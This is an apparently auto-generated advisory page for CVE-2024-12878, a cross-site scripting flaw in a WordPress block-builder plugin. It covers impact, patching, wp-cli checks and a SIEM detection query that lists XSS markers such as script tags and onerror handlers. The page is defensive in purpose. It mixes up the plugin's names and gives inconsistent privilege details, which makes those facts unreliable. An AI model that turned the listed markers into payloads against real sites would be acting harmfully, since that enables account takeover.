CVE-2024-12878 – This vulnerability in the Custom Block Builder ... (How to Fix)

Q: What is the severity of CVE-2024-12878?

CVE-2024-12878 has a CVSS score of 7.1 (HIGH). This vulnerability in the Custom Block Builder WordPress plugin allows attackers to inject malicious scripts via unsanitized parameters, which execute when viewed by administrators or other high-privilege users. It affects WordPress sites running vulnerable plugin versions, potentially compromising administrative accounts.

📋 TL;DR

This vulnerability in the Custom Block Builder WordPress plugin allows attackers to inject malicious scripts via unsanitized parameters, which execute when viewed by administrators or other high-privilege users. It affects WordPress sites running vulnerable plugin versions, potentially compromising administrative accounts.

💻 Affected Systems

Products:

WordPress Custom Block Builder plugin

Versions: All versions before 3.8.3

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires WordPress installation with vulnerable plugin version. Attack requires tricking authenticated admin to click malicious link.

📦 What is this software?

Lazy Blocks by Thedevoice

View all CVEs affecting Lazy Blocks →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator account takeover leading to full site compromise, data theft, malware injection, or complete system control.

🟠

Likely Case

Session hijacking of admin accounts, privilege escalation, or defacement of the WordPress site.

🟢

If Mitigated

Limited impact with proper user awareness, security plugins, and network segmentation preventing successful exploitation.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Exploitation requires social engineering to lure admin to malicious URL. No authentication bypass needed beyond admin clicking link.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.8.3

Vendor Advisory: https://wpscan.com/vulnerability/827444d1-87cb-4057-827a-d802eac82cf8/

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find Custom Block Builder plugin. 4. Click 'Update Now' if update available. 5. Alternatively, download version 3.8.3+ from WordPress repository and manually update.

🔧 Temporary Workarounds

Disable vulnerable plugin

all

Temporarily deactivate Custom Block Builder plugin until patched.

wp plugin deactivate custom-block-builder

Implement WAF rules

all

Add web application firewall rules to block XSS payloads targeting the vulnerable parameter.

🧯 If You Can't Patch

Restrict admin access to trusted networks only using IP whitelisting
Implement Content Security Policy (CSP) headers to mitigate XSS impact

🔍 How to Verify

Check if Vulnerable:

Check plugin version in WordPress admin under Plugins > Installed Plugins. If version is below 3.8.3, system is vulnerable.

Check Version:

wp plugin get custom-block-builder --field=version

Verify Fix Applied:

Confirm plugin version is 3.8.3 or higher in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

Unusual GET/POST requests with script tags or JavaScript in parameters
Multiple failed admin login attempts following suspicious URL access

Network Indicators:

HTTP requests containing malicious script payloads in query parameters
Outbound connections to suspicious domains from WordPress server

SIEM Query:

source="wordpress.log" AND ("<script" OR "javascript:" OR "onload=" OR "onerror=")

📊 Metadata

CVE ID: CVE-2024-12878

CVSS v3 Score: 7.1 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

CWE: CWE-79

EPSS Score: 2.42% exploit probability (84.8th percentile)

Published: February 26, 2025

Last Updated: May 15, 2025

🔗 References

https://wpscan.com/vulnerability/827444d1-87cb-4057-827a-d802eac82cf8/ Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-12878, you might also want to check these: